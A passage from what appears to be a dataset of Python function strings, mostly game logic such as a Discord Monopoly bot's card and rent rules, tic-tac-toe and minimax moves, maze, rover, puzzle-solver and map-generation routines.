${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 11:\n\t\t\t\t\tself.bal[self.p] -= 100\n\t\t\t\t\tself.freeparkingsum += 100\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 12:\n\t\t\t\t\tself.bal[self.p] -= 150\n\t\t\t\t\tself.freeparkingsum += 150\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 13:\n\t\t\t\t\tself.bal[self.p] += 25\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 14:\n\t\t\t\t\tpay = 0\n\t\t\t\t\tfor i in range(40):\n\t\t\t\t\t\tif self.ownedby[i] == self.p:\n\t\t\t\t\t\t\tif self.numhouse[i] == 0 or self.numhouse[i] == -1:\n\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\telif self.numhouse[i] == 5:\n\t\t\t\t\t\t\t\tpay += 115\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tpay += 40 * self.numhouse[i]\n\t\t\t\t\tself.bal[self.p] -= pay\n\t\t\t\t\tmsg += f'You paid ${pay} in repairs. You now have ${self.bal[self.p]}.\\n'\n\t\t\t\tself.ccn += 1\n\t\t\t\tif self.ccn > 16:\n\t\t\t\t\tshuffle(self.ccorder)\n\t\t\t\t\tself.ccn = 0\n\t\t\telif self.tile[self.p] in (7, 22, 36): #chance\n\t\t\t\tcard = self.chanceorder[self.chancen]\n\t\t\t\tmsg += f'Your card reads:\\n{CHANCENAME[card]}\\n'\n\t\t\t\tif card == 0:\n\t\t\t\t\tself.tile[self.p] = 0\n\t\t\t\t\tdoDoubleGo = await self.cog.config.guild(self.ctx.guild).doDoubleGo()\n\t\t\t\t\tgoValue = await self.cog.config.guild(self.ctx.guild).goValue()\n\t\t\t\t\tif doDoubleGo:\n\t\t\t\t\t\tself.bal[self.p] += goValue * 2\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.bal[self.p] += goValue\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 1:\n\t\t\t\t\tif self.tile[self.p] > 24:\n\t\t\t\t\t\tgoValue = await self.cog.config.guild(self.ctx.guild).goValue()\n\t\t\t\t\t\tself.bal[self.p] += goValue\n\t\t\t\t\t\tmsg += f'You passed go, you now have ${self.bal[self.p]}.\\n'\n\t\t\t\t\tself.tile[self.p] = 24\n\t\t\t\t\tmsg = await self.land(msg, 0)\n\t\t\t\telif card == 2:\n\t\t\t\t\tif self.tile[self.p] > 11:\n\t\t\t\t\t\tgoValue = await self.cog.config.guild(self.ctx.guild).goValue()\n\t\t\t\t\t\tself.bal[self.p] += goValue\n\t\t\t\t\t\tmsg += f'You passed go, you now have ${self.bal[self.p]}.\\n'\n\t\t\t\t\tself.tile[self.p] = 11\n\t\t\t\t\tmsg = await self.land(msg, 0)\n\t\t\t\telif card == 3:\n\t\t\t\t\tif self.tile[self.p] <= 12:\n\t\t\t\t\t\tself.tile[self.p] = 12\n\t\t\t\t\telif 12 < self.tile[self.p] <= 28:\n\t\t\t\t\t\tself.tile[self.p] = 28\n\t\t\t\t\telse:\n\t\t\t\t\t\tgoValue = await self.cog.config.guild(self.ctx.guild).goValue()\n\t\t\t\t\t\tself.bal[self.p] += goValue\n\t\t\t\t\t\tmsg += f'You passed go, you now have ${self.bal[self.p]}.\\n'\n\t\t\t\t\t\tself.tile[self.p] = 12\n\t\t\t\t\t#must pay 10x rent if owned\n\t\t\t\t\tif (\n\t\t\t\t\t\tself.ownedby[self.tile[self.p]] != self.p\n\t\t\t\t\t\tand self.ownedby[self.tile[self.p]] >= 0\n\t\t\t\t\t\tand self.ismortgaged[self.tile[self.p]] != 1\n\t\t\t\t\t):\n\t\t\t\t\t\tmemown = await self.get_member(\n\t\t\t\t\t\t\tself.uid[self.ownedby[self.tile[self.p]]]\n\t\t\t\t\t\t)\n\t\t\t\t\t\tself.bal[self.p] -= distance * 10\n\t\t\t\t\t\tself.bal[self.ownedby[self.tile[self.p]]] += distance * 10\n\t\t\t\t\t\tmsg += (\n\t\t\t\t\t\t\tf'You paid ${distance * 10} of rent to {memown.display_name}. '\n\t\t\t\t\t\t\tf'You now have ${self.bal[self.p]}. {memown.display_name} now has '\n\t\t\t\t\t\t\tf'${self.bal[self.ownedby[self.tile[self.p]]]}.\\n'\n\t\t\t\t\t\t)\n\t\t\t\t\telse:\n\t\t\t\t\t\tmsg = await self.land(msg, 0)\n\t\t\t\telif card == 4:\n\t\t\t\t\tif self.tile[self.p] <= 5:\n\t\t\t\t\t\tself.tile[self.p] = 5\n\t\t\t\t\telif self.tile[self.p] <= 15:\n\t\t\t\t\t\tself.tile[self.p] = 15\n\t\t\t\t\telif self.tile[self.p] <= 25:\n\t\t\t\t\t\tself.tile[self.p] = 25\n\t\t\t\t\telif self.tile[self.p] <= 35:\n\t\t\t\t\t\tself.tile[self.p] = 35\n\t\t\t\t\telse:\n\t\t\t\t\t\tgoValue = await self.cog.config.guild(self.ctx.guild).goValue()\n\t\t\t\t\t\tself.bal[self.p] += goValue\n\t\t\t\t\t\tmsg += f'You passed go, you now have ${self.bal[self.p]}.\\n'\n\t\t\t\t\t\tself.tile[self.p] = 5\n\t\t\t\t\t#must pay 2x rent if owned\n\t\t\t\t\tif (\n\t\t\t\t\t\tself.ownedby[self.tile[self.p]] != self.p\n\t\t\t\t\t\tand self.ownedby[self.tile[self.p]] >= 0\n\t\t\t\t\t\tand self.ismortgaged[self.tile[self.p]] != 1\n\t\t\t\t\t):\n\t\t\t\t\t\tmemown = await self.get_member(\n\t\t\t\t\t\t\tself.uid[self.ownedby[self.tile[self.p]]]\n\t\t\t\t\t\t)\n\t\t\t\t\t\trrcount = 0\n\t\t\t\t\t\tif self.ownedby[5] == self.ownedby[self.tile[self.p]]:\n\t\t\t\t\t\t\trrcount += 1\n\t\t\t\t\t\tif self.ownedby[15] == self.ownedby[self.tile[self.p]]:\n\t\t\t\t\t\t\trrcount += 1\n\t\t\t\t\t\tif self.ownedby[25] == self.ownedby[self.tile[self.p]]:\n\t\t\t\t\t\t\trrcount += 1\n\t\t\t\t\t\tif self.ownedby[35] == self.ownedby[self.tile[self.p]]:\n\t\t\t\t\t\t\trrcount += 1\n\t\t\t\t\t\tself.bal[self.p] -= RRPRICE[rrcount] * 2\n\t\t\t\t\t\tself.bal[self.ownedby[self.tile[self.p]]] += RRPRICE[rrcount] * 2\n\t\t\t\t\t\tmsg += (\n\t\t\t\t\t\t\tf'You paid ${RRPRICE[rrcount] * 2} of rent to {memown.display_name}. '\n\t\t\t\t\t\t\tf'You now have ${self.bal[self.p]}. {memown.display_name} now has '\n\t\t\t\t\t\t\tf'${self.bal[self.ownedby[self.tile[self.p]]]}.\\n'\n\t\t\t\t\t\t)\n\t\t\t\t\telse:\n\t\t\t\t\t\tmsg = await self.land(msg, 0)\n\t\t\t\telif card == 5:\n\t\t\t\t\tself.bal[self.p] += 50\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 6:\n\t\t\t\t\tself.goojf[self.p] += 1\n\t\t\t\t\tif self.goojf[self.p] == 1:\n\t\t\t\t\t\tmsg += 'You now have 1 get out of jail free card.\\n'\n\t\t\t\t\telse:\n\t\t\t\t\t\tmsg += f'You now have {self.goojf[self.p]} get out of jail free cards.\\n'\n\t\t\t\telif card == 7:\n\t\t\t\t\tself.tile[self.p] -= 3\n\t\t\t\t\tmsg = await self.land(msg, 0)\n\t\t\t\telif card == 8:\n\t\t\t\t\tself.tile[self.p] = 10\n\t\t\t\t\tself.injail[self.p] = True\n\t\t\t\t\tself.was_doubles = False\n\t\t\t\telif card == 9:\n\t\t\t\t\tpay = 0\n\t\t\t\t\tfor i in range(40):\n\t\t\t\t\t\tif self.ownedby[i] == self.p:\n\t\t\t\t\t\t\tif self.numhouse[i] == 0 or self.numhouse[i] == -1:\n\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\telif self.numhouse[i] == 5:\n\t\t\t\t\t\t\t\tpay += 100\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tpay += 25 * self.numhouse[i]\n\t\t\t\t\tself.bal[self.p] -= pay\n\t\t\t\t\tmsg += f'You paid ${pay} in repairs. You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 10:\n\t\t\t\t\tself.bal[self.p] -= 15\n\t\t\t\t\tself.freeparkingsum += 15\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 11:\n\t\t\t\t\tif self.tile[self.p] > 5:\n\t\t\t\t\t\tgoValue = await self.cog.config.guild(self.ctx.guild).goValue()\n\t\t\t\t\t\tself.bal[self.p] += goValue\n\t\t\t\t\t\tmsg += f'You passed go, you now have ${self.bal[self.p]}.\\n'\n\t\t\t\t\tself.tile[self.p] = 5\n\t\t\t\t\tmsg = await self.land(msg, 0)\n\t\t\t\telif card == 12:\n\t\t\t\t\tself.tile[self.p] = 39\n\t\t\t\t\tmsg = await self.land(msg, 0)\n\t\t\t\telif card == 13:\n\t\t\t\t\tself.bal[self.p] -= 50 * (self.numalive - 1)\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\t\tfor i in range(self.num):\n\t\t\t\t\t\tif self.isalive[i] and not i == self.p:\n\t\t\t\t\t\t\tmem = await self.get_member(self.uid[i])\n\t\t\t\t\t\t\tself.bal[i] += 50\n\t\t\t\t\t\t\tmsg += f'{mem.display_name} now has ${self.bal[i]}.\\n'\n\t\t\t\telif card == 14:\n\t\t\t\t\tself.bal[self.p] += 150\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\telif card == 15:\n\t\t\t\t\tself.bal[self.p] += 100\n\t\t\t\t\tmsg += f'You now have ${self.bal[self.p]}.\\n'\n\t\t\t\tself.chancen += 1\n\t\t\t\tif self.chancen > 15:\n\t\t\t\t\tshuffle(self.chanceorder)\n\t\t\t\t\tself.chancen = 0\n\t\t\telif self.tile[self.p] == 4: #income tax\n\t\t\t\tincomeValue = await self.cog.config.guild(self.ctx.guild).incomeValue()\n\t\t\t\tself.bal[self.p] -= incomeValue\n\t\t\t\tself.freeparkingsum += incomeValue\n\t\t\t\tmsg += (\n\t\t\t\t\tf'You paid ${incomeValue} of Income Tax. You now have ${self.bal[self.p]}.\\n'\n\t\t\t\t)\n\t\t\telif self.tile[self.p] == 38: #luxury tax\n\t\t\t\tluxuryValue = await self.cog.config.guild(self.ctx.guild).luxuryValue()\n\t\t\t\tself.bal[self.p] -= luxuryValue\n\t\t\t\tself.freeparkingsum += luxuryValue\n\t\t\t\tmsg += (\n\t\t\t\t\tf'You paid ${luxuryValue} of Luxury Tax. You now have ${self.bal[self.p]}.\\n'\n\t\t\t\t)\n\t\telif self.ownedby[self.tile[self.p]] == -1: #unowned and ownable\n\t\t\tif self.bal[self.p] >= PRICEBUY[self.tile[self.p]]: #can afford\n\t\t\t\tmsg += (\n\t\t\t\t\tf'Would you like to buy {TILENAME[self.tile[self.p]]} '\n\t\t\t\t\tf'for ${PRICEBUY[self.tile[self.p]]}? (y/n) You have ${self.bal[self.p]}.'\n\t\t\t\t)\n\t\t\t\tawait self.ctx.send(file=discord.File(self.bprint()))\n\t\t\t\tawait self.ctx.send(msg)\n\t\t\t\tchoice = await self.bot.wait_for(\n\t\t\t\t\t'message',\n\t\t\t\t\ttimeout=await self.cog.config.guild(self.ctx.guild).timeoutValue(),\n\t\t\t\t\tcheck=lambda m: (\n\t\t\t\t\t\tm.author.id == self.uid[self.p]\n\t\t\t\t\t\tand m.channel == self.ctx.channel\n\t\t\t\t\t\tand m.content.lower() in ('y', 'yes', 'n', 'no')\n\t\t\t\t\t)\n\t\t\t\t)\n\t\t\t\tchoice = choice.content[0].lower()\n\t\t\t\tif choice == 'y': #buy property\n\t\t\t\t\tself.bal[self.p] -= PRICEBUY[self.tile[self.p]]\n\t\t\t\t\tself.ownedby[self.tile[self.p]] = self.p\n\t\t\t\t\tmsg = (\n\t\t\t\t\t\tf'You now own {TILENAME[self.tile[self.p]]}!\\n'\n\t\t\t\t\t\tf'You have ${self.bal[self.p]} remaining.\\n'\n\t\t\t\t\t)\n\t\t\t\telse: #pass on property\n\t\t\t\t\tmsg = ''\n\t\t\t\t\tdoAuction = await self.cog.config.guild(self.ctx.guild).doAuction()\n\t\t\t\t\tif doAuction:\n\t\t\t\t\t\tmsg = await self.auction(msg)\n\t\t\telse: #cannot afford\n\t\t\t\tmsg += (\n\t\t\t\t\tf'You cannot afford to buy {TILENAME[self.tile[self.p]]}, '\n\t\t\t\t\tf'you only have ${self.bal[self.p]} of ${PRICEBUY[self.tile[self.p]]}.\\n'\n\t\t\t\t)\n\t\t\t\tdoAuction = await self.cog.config.guild(self.ctx.guild).doAuction()\n\t\t\t\tif doAuction:\n\t\t\t\t\tmsg = await self.auction(msg)\n\t\telif RENTPRICE[self.tile[self.p]*6] == -1: #pay rr/util rent\n\t\t\tmemown = await self.get_member(self.uid[self.ownedby[self.tile[self.p]]])\n\t\t\tif self.tile[self.p] in (12, 28): #utility\n\t\t\t\tif self.ownedby[12] == self.ownedby[28]: #own both\n\t\t\t\t\tself.bal[self.p] -= distance * 10\n\t\t\t\t\tself.bal[self.ownedby[self.tile[self.p]]] += distance * 10\n\t\t\t\t\tmsg += (\n\t\t\t\t\t\tf'You paid ${distance * 10} of rent to {memown.display_name}. '\n\t\t\t\t\t\tf'You now have ${self.bal[self.p]}. {memown.display_name} now has '\n\t\t\t\t\t\tf'${self.bal[self.ownedby[self.tile[self.p]]]}.\\n'\n\t\t\t\t\t)\n\t\t\t\telse: #own only one\n\t\t\t\t\tself.bal[self.p] -= distance * 4\n\t\t\t\t\tself.bal[self.ownedby[self.tile[self.p]]] += distance * 4\n\t\t\t\t\tmsg += (\n\t\t\t\t\t\tf'You paid ${distance * 4} of rent to {memown.display_name}. '\n\t\t\t\t\t\tf'You now have ${self.bal[self.p]}. {memown.display_name} now has '\n\t\t\t\t\t\tf'${self.bal[self.ownedby[self.tile[self.p]]]}.\\n'\n\t\t\t\t\t) \n\t\t\telif self.tile[self.p] in (5, 15, 25, 35): #railroad\n\t\t\t\trrcount = 0\n\t\t\t\tif self.ownedby[5] == self.ownedby[self.tile[self.p]]:\n\t\t\t\t\trrcount += 1\n\t\t\t\tif self.ownedby[15] == self.ownedby[self.tile[self.p]]:\n\t\t\t\t\trrcount += 1\n\t\t\t\tif self.ownedby[25] == self.ownedby[self.tile[self.p]]:\n\t\t\t\t\trrcount += 1\n\t\t\t\tif self.ownedby[35] == self.ownedby[self.tile[self.p]]:\n\t\t\t\t\trrcount += 1\n\t\t\t\tself.bal[self.p] -= RRPRICE[rrcount]\n\t\t\t\tself.bal[self.ownedby[self.tile[self.p]]] += RRPRICE[rrcount]\n\t\t\t\tmsg += (\n\t\t\t\t\tf'You paid ${RRPRICE[rrcount]} of rent to {memown.display_name}. '\n\t\t\t\t\tf'You now have ${self.bal[self.p]}. {memown.display_name} now has '\n\t\t\t\t\tf'${self.bal[self.ownedby[self.tile[self.p]]]}.\\n'\n\t\t\t\t)\n\t\telse: #pay normal rent\n\t\t\tmemown = await self.get_member(self.uid[self.ownedby[self.tile[self.p]]])\n\t\t\tisMonopoly = False\n\t\t\tfor group in PROPGROUPS:\n\t\t\t\tif self.tile[self.p] in group:\n\t\t\t\t\tif all(\n\t\t\t\t\t\t[self.ownedby[self.tile[self.p]] == self.ownedby[prop] for prop in group]\n\t\t\t\t\t):\n\t\t\t\t\t\tisMonopoly = True\n\t\t\t\t\tbreak\n\t\t\tif isMonopoly and self.numhouse[self.tile[self.p]] == 0: #2x rent\n\t\t\t\trent = 2 * RENTPRICE[self.tile[self.p] * 6]\n\t\t\telse: #normal rent\n\t\t\t\trent = RENTPRICE[(self.tile[self.p] * 6) + self.numhouse[self.tile[self.p]]]\n\t\t\tself.bal[self.p] -= rent\n\t\t\tself.bal[self.ownedby[self.tile[self.p]]] += rent\n\t\t\tmsg += (\n\t\t\t\tf'You paid ${rent} of rent to {memown.display_name}. '\n\t\t\t\tf'You now have ${self.bal[self.p]}. '\n\t\t\t\tf'{memown.display_name} now has ${self.bal[self.ownedby[self.tile[self.p]]]}.\\n'\n\t\t\t)\n\t\tif self.bal[self.p] < 0:\n\t\t\tmsg = await self.debt(msg)\n\t\treturn msg", "def repairWall(self, game_state):\n first_row = [[0, 13], [1, 13],[2, 13],[3, 13],[4, 13],[5, 13],[6, 13],[7, 13],[8, 13],[9, 13],[10, 13],[11, 13],[12, 13],[13, 13],[15, 13],[16, 13],[17, 13],[18, 13],[19, 13],[20, 13],[21, 13],[22, 13],[23, 13],[24, 13],[25, 13],[26, 13],[27, 13]]\n destructor_loc1 = [[12,11], [16,11]]\n second_row = [[13, 12],[15, 12],[12, 12],[16, 12],[11, 12],[17, 12],[1, 12],[2, 12],[3, 12],[4, 12],[5, 12],[6, 12],[7, 12],[8, 12],[9, 12],[10, 12],[18, 12],[19, 12],[20, 12],[21, 12],[22, 12],[23, 12],[24, 12],[25, 12],[26, 12]]\n destructor_loc2 = [[8,11], [20,11]]\n encryptor_loc1 = [[13,11], [15,11]]\n destructor_loc3 = [[4,11], [24,11]]\n encryptor_row1 = [[13,10], [15,10]]\n destructor_row1 = [[12,10], [16,10]]\n encryptor_row2 = [[13,9], [15,9]]\n destructor_row2 = [[12,9], [16,9]]\n encryptor_row3 = [[13,8], [15,8]]\n destructor_row3 = [[12,8], [16,8]]\n\n for location in first_row:\n if game_state.can_spawn(FILTER, location):\n game_state.attempt_spawn(FILTER, location)\n\n for location in destructor_loc1:\n if game_state.can_spawn(DESTRUCTOR, location):\n game_state.attempt_spawn(DESTRUCTOR, location)\n\n for location in second_row:\n if game_state.can_spawn(FILTER, location):\n game_state.attempt_spawn(FILTER, location)\n\n for location in destructor_loc2:\n if game_state.can_spawn(DESTRUCTOR, location):\n game_state.attempt_spawn(DESTRUCTOR, location)\n\n for location in encryptor_loc1:\n if game_state.can_spawn(ENCRYPTOR, location):\n game_state.attempt_spawn(ENCRYPTOR, location)\n\n for location in destructor_loc3:\n if game_state.can_spawn(DESTRUCTOR, location):\n game_state.attempt_spawn(DESTRUCTOR, location)\n\n for location in encryptor_row1:\n if game_state.can_spawn(ENCRYPTOR, location):\n game_state.attempt_spawn(ENCRYPTOR, location)\n\n for location in destructor_row1:\n if game_state.can_spawn(DESTRUCTOR, location):\n game_state.attempt_spawn(DESTRUCTOR, location)\n\n for location in encryptor_row2:\n if game_state.can_spawn(ENCRYPTOR, location):\n game_state.attempt_spawn(ENCRYPTOR, location)\n\n for location in destructor_row2:\n if game_state.can_spawn(DESTRUCTOR, location):\n game_state.attempt_spawn(DESTRUCTOR, location)\n\n for location in encryptor_row3:\n if game_state.can_spawn(ENCRYPTOR, location):\n game_state.attempt_spawn(ENCRYPTOR, location)\n\n for location in destructor_row3:\n if game_state.can_spawn(DESTRUCTOR, location):\n game_state.attempt_spawn(DESTRUCTOR, location)", "def rop():\n return", "def make_move(self):\n\n # If the agent is starting a game, make an \n # initial move\n if self.get_play_status() == False: \n self.initial_move()\n return\n\n # for speeds sake, allow the reflex agent to respond to manual\n # input. comment out for automatic running.\n x = int(input('hotwire x:'))\n y = int(input('hotwire y:'))\n return self.get_game_space().set_tile(x,y,self.get_affinity())\n\n # Check wheather the the agent side is going to \n # win by making one move, make the move\n # OR\n # Check if the oponent has a compromising move \n best_move = self.victory_check()\n if best_move is None: best_move = self.counter_opponent_win()\n if best_move is None: best_move = self.counter_opponent_adv()\n if best_move is None: best_move = self.best_last_option()\n if best_move != None: \n x = best_move[0]\n y = best_move[1]\n return self.get_game_space().set_tile(x,y,self.get_affinity())", "def new_move(self, grid_x, grid_y, player):\n #duplication /!\\\n if player == self.X:\n self.draw_X(grid_x, grid_y)\n self.board[grid_y][grid_x] = self.X\n\n elif player == self.O:\n self.draw_O(grid_x, grid_y)\n self.board[grid_y][grid_x] = self.O", "def place_pillar_a(self):\r\n x = random.randint(0, (self.__nx - 1))\r\n y = random.randint(0, (self.__ny - 1))\r\n self.__pillar_a = x, y\r\n if self.pillar_a_room() == self.pillar_e_room() or \\\r\n self.pillar_a_room() == self.pillar_i_room() or \\\r\n self.pillar_a_room() == self.pillar_p_room() or \\\r\n self.pillar_a_room() == self.entrance_room() or \\\r\n self.pillar_a_room() == self.exit_room():\r\n return self.place_pillar_a()\r\n self.__maze[x][y].set_pillar_a(True)", "def navigate_rover(self, name, instruction_str):\n\n rover = self.rovers.get(name)\n if not rover:\n raise RoverException(ExceptionMessages.BAD_NAME)\n\n coordinate = copy.deepcopy(rover.coordinate)\n direction = rover.direction\n\n for instruction in instruction_str:\n\n if instruction == 'L' or instruction == 'R':\n direction = self._direction_after_turning(direction, instruction)\n elif instruction == 'M':\n coordinate = self._coordinate_after_moving(direction, coordinate)\n else:\n raise RoverException(ExceptionMessages.INVALID_INSTRUCTION)\n\n # This means we have processed all the instructions without exception\n # assign new direction and coordinates to rover\n rover.direction = direction\n rover.coordinate = coordinate", "def make_move(self, row, column):\n\t\tif self.board[int(row)][int(column)] == '-':\n\t\t\tself.board[int(row)][int(column)] = self.marker\n\t\telse:\n\t\t\tprint(\"That spot is occupied, you messed up, you lose your turn for doing bad things\")", "def calculate_next_move(self, visit):\n self.depth += 1\n new_boards = []\n for vehicle_id in range(len(self.vehicles)):\n vehicle = self.vehicles[vehicle_id]\n state = self.get_board()\n if vehicle.orientation == 0: #horizontal\n if vehicle.x > 0: #left\n if state[vehicle.y][vehicle.x-1] == \"..\":\n self.vehicles[vehicle_id].x -=1\n if not self.get_board().tostring() in visit:\n if not self.get_board().all in new_boards:\n new_board = deepcopy(self)\n self.vehicles[vehicle_id].x += 1\n new_board.parent = self\n new_boards.append(new_board)\n else:\n self.vehicles[vehicle_id].x += 1\n\n if vehicle.x + vehicle.length <= (len(state)-1): #right\n if state[vehicle.y][vehicle.x+vehicle.length] == \"..\":\n self.vehicles[vehicle_id].x += 1\n if not self.get_board().tostring() in visit:\n if not self.get_board().all in new_boards:\n new_board = deepcopy(self)\n self.vehicles[vehicle_id].x -= 1\n new_board.parent = self\n new_boards.append(new_board)\n else:\n self.vehicles[vehicle_id].x -= 1\n\n else: #vertical\n if vehicle.y - 1 >= 0: #up\n if state[vehicle.y-1][vehicle.x] == \"..\":\n self.vehicles[vehicle_id].y -= 1\n if not self.get_board().tostring() in visit:\n if not self.get_board().all in new_boards:\n new_board = deepcopy(self)\n self.vehicles[vehicle_id].y += 1\n new_board.parent = self\n new_boards.append(new_board)\n else:\n self.vehicles[vehicle_id].y += 1\n\n if vehicle.y + vehicle.length <= (len(state)-1):\n if state[vehicle.y + vehicle.length][vehicle.x] == \"..\":#down\n self.vehicles[vehicle_id].y += 1\n if not self.get_board().tostring() in visit:\n if not self.get_board().all in new_boards:\n new_board = deepcopy(self)\n self.vehicles[vehicle_id].y -= 1\n new_board.parent = self\n new_boards.append(new_board)\n else:\n self.vehicles[vehicle_id].y -= 1\n self.depth -= 1\n return new_boards", "def move_repeatedly():\n check = check50.run(run_command)\n check.stdin(\"WEST\").stdout(room_2_description)\n check.stdin(\"EAST\").stdout(room_1_name)\n check.stdin(\"WEST\").stdout(room_2_name)", "def move_marble(self, coordinates, direction):\n pass", "def move(self):\n # neighbor offsets\n offset = [(-1, 1),(0, 1),(1, 1),(-1, 0),(1, 0),(-1, -1),(0, -1),(1, -1)]\n for i in range(len(offset)):\n x = self.x + offset[i][0] # neighboring coordinates\n y = self.y + offset[i][1]\n if self.island.animal(x, y) == 0: # neighboring spot is open\n self.island.remove(self) # remove from current spot\n self.x = x # new coordinates\n self.y = y\n self.island.register(self) # register new coordinates\n break # finished with move", "def move(self):\n # neighbor offsets\n offset = [(-1, 1),(0, 1),(1, 1),(-1, 0),(1, 0),(-1, -1),(0, -1),(1, -1)]\n for i in range(len(offset)):\n x = self.x + offset[i][0] # neighboring coordinates\n y = self.y + offset[i][1]\n if self.island.animal(x, y) == 0: # neighboring spot is open\n self.island.remove(self) # remove from current spot\n self.x = x # new coordinates\n self.y = y\n self.island.register(self) # register new coordinates\n break # finished with move", "def move_buildings(self):", "def make_move(self):\n\n # get relavent information\n affinity = self.get_affinity()\n sample_space = self.get_game_space()\n depth_limit = self.__search_depth\n\n # run a minimax search and get the best value\n bestval = MinimaxTree.alphabeta(self, sample_space, affinity, depth_limit, -10000, 10001, True)\n if bestval[0] is None: bestval = ((0,6),'x', 0)\n\n # print the number of nodes expanded \n print(self.nodes_expanded)\n\n # make the move found by the search \n self.get_game_space().set_tile(bestval[0][0], bestval[0][1], affinity)", "def carve_path(self):\n final = self.length # once we reach the last length, we set the goal and terminate\n w, l, h = 0, 0, 0 # start at 0,0,0\n last_move_name, last_move_tuple = \"forward\", (0, 1, 0) # we don't want to repeat the last movement\n moves = {\"back\": (0, -1, 0), \"left\": (-1, 0, 0), \"right\": (1, 0, 0), \"up\": (0, 0, 1),\n \"down\": (0, 0, -1)} # possible moves\n self.world_grid[w][l][h] = blocks[\"empty\"] # set the current block empty\n while l != final:\n move, (m_w, m_l, m_h) = random.choice(list(moves.iteritems())) # get a move\n w += m_w # apply move\n l += m_l\n h += m_h\n self.world_grid[w][l][h] = blocks[\"empty\"] # set that cell empty\n moves[last_move_name] = last_move_tuple # add back in the last move to movelist\n last_move_name, last_move_tuple = move, (m_w, m_l, m_h) # copy the current move to last move\n moves.pop(last_move_name) # remove the current\n self.goal = (w, l, h) # after terminating, set this as the goal", "def move(self, direction):\n # replace with your code\n\n indices = self.direction_indices[direction]\n for coordinate in indices:\n merged_coordinate_list = self.get_list(direction, coordinate)\n self.change_board(merged_coordinate_list, coordinate, direction)\n print(self.__str__())\n if self.board_is_not_full():\n self.new_tile()", "def breaking_of_the_box(size = (10, 10), verbose = False):\n import numpy as np\n r, l, u, d = \"R\", \"L\", \"U\", \"D\" # initiating walkind directions\n np.random.seed(int(time.time()))\n \n # initiating field with walking directions\n field = np.random.randint(1, 5, size = (10, 10))\n field = np.where(field ==1, r, field)\n field = np.where(field =='2', l, field)\n field = np.where(field =='3', u, field)\n field = np.where(field =='4', d, field)\n\n i, j = 0, 0\n coordinates = []\n \n # iterating in a field\n while (i<field.shape[0] and i>-1) and (j<field.shape[1] and j>-1):\n prev_i,prev_j = i, j\n coordinates.append((i, j)) \n \n copy_field = field.copy()\n \n if field[i][j] == r:\n j+=1\n elif field[i][j] == l:\n j-=1\n elif field[i][j] == u:\n i-=1\n elif field[i][j] == d:\n i+=1\n copy_field[i][j] = \"X\"\n if verbose == True:\n print(copy_field, \"#\"*48, sep = \"\\n\") #printing step by step position of a player\n if (i, j) in coordinates:\n # in case of infitine loop break\n print(\"Player is stucked inside of a box\")\n break\n\n else:\n print(\"Player came out of the box\")\n print(\"Coordinates of a breaking point\", \"(\", prev_i, prev_j, \")\")", "def move_robot(room, direction):\r\n\r\n robot_row, robot_col = robot_location(room)\r\n\r\n intended_row = robot_row\r\n intended_col = robot_col\r\n\r\n if direction == \"right\":\r\n intended_col = robot_col + 1\r\n elif direction == \"left\":\r\n intended_col = robot_col - 1\r\n elif direction == \"up\":\r\n intended_row = robot_row - 1\r\n elif direction == \"down\":\r\n intended_row = robot_row + 1\r\n\r\n if room[intended_row][intended_col] != \"obstacle\":\r\n room[intended_row][intended_col] = \"robot\"\r\n room[robot_row][robot_col] = \"empty\"\r\n\r\n return room", "def add_river_greedy(me, lm, material_dict, imgs, rounded_river,\n min_length):\n print(\" Building random river...\")\n cell_source = get_river_source(material_dict)\n if not(cell_source):\n print(\"no cell source\")\n return\n xi,yi = cell_source\n cell_source = lm.cells[xi][yi]\n path = [cell_source]\n cell_xy = cell_source\n maxn = 1000\n it = 0\n should_finish = False\n margin = 0.01\n lake_probability = 0.5\n while True:\n if it > maxn:\n break\n elif \"water\" in cell_xy.material.name.lower():\n break\n elif should_finish:\n break\n it += 1\n section_length = random.randint(2,10)\n if random.random() < 0.5:\n sign = 1\n else:\n sign = -1\n if random.random() < 0.5:\n dx, dy = sign, 0\n else:\n dx, dy = 0, sign\n## print(dx,dy,section_length)\n ################################################\n for i in range(section_length):\n if should_finish:\n break\n x = cell_xy.coord[0] + dx\n y = cell_xy.coord[1] + dy\n new_cell = lm.get_cell_at(x,y)\n if new_cell is None:\n break\n elif new_cell.h - margin > cell_xy.h:\n if cell_xy.material.name != new_cell.material.name:\n break\n elif new_cell in path:\n break\n elif new_cell.name != \"river\":\n is_valid = True\n for neigh in new_cell.get_neighbors_von_neuman():\n if neigh:\n if not(neigh is cell_xy):\n if neigh.name == \"river\":\n is_valid = False\n break\n elif \"water\" in neigh.material.name.lower():\n should_finish = True\n elif neigh in path:\n is_valid = False\n break\n if is_valid:\n cell_xy = new_cell\n path.append(new_cell)\n## print(\"OK\",dx,dy,section_length)\n else:\n break\n else:\n break\n #4) change the end to first shallow shore cell\n actual_path = []\n for cell in path:\n if cell.name == \"river\":\n break\n actual_path.append(cell)\n if \"water\" in cell.material.name.lower():\n break\n else: #LAKE ?\n next_to_water = False\n for neigh in cell.get_neighbors_von_neuman():\n if neigh:\n if \"water\" in neigh.material.name.lower():\n next_to_water = True\n break\n if next_to_water:\n break\n if len(actual_path) < min_length:\n return\n if actual_path[0].material.name == actual_path[-1].material.name:\n return\n elif not(\"water\" in actual_path[-1].material.name.lower()):\n if random.random() < lake_probability:\n pass\n else:\n return\n #build images of river\n objs = {}\n for delta in imgs: #imgs[(dx,dy)][zoom]\n river_obj = MapObject(me, imgs[delta][0], \"river\", 1.)\n river_obj.is_ground = True\n river_obj.lm = 